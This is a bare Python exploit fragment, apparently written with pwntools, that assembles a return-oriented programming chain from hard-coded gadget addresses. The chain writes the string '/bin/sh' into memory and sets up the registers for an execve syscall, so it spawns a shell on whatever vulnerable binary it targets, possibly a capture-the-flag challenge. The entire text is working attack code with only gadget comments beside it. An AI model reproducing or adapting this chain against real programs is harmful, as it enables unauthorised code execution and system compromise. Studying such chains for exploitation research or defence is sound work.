payload = p64(0x44608f)
#0x000000000044608f: pop rax; ret; 
payload += p64(0xa81070)+p64(0x559017)
# 0x0000000000559017: xchg eax, ecx; ret; 
payload += p64(0x44608f)
# 0x000000000044608f: pop rax; ret; 
payload += p64(0x68662f6e69622f)+p64(0x67bafe)
# 0x000000000067bafe: add qword ptr [rcx], rax; ret 0; 
payload += p64(0x44608f)
# 0x000000000044608f: pop rax; ret; 
payload += p64(0x3b)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0xa81070)+p64(0x505123)
# 0x0000000000505123: pop rsi; ret; 
payload += p64(0x0)+p64(0x4e2a56)
# 0x00000000004e2a56: pop rdx; ret; 
payload += p64(0x0)+p64(0x406bfe)
# 0x0000000000406bfe: syscall; 
payload += b''
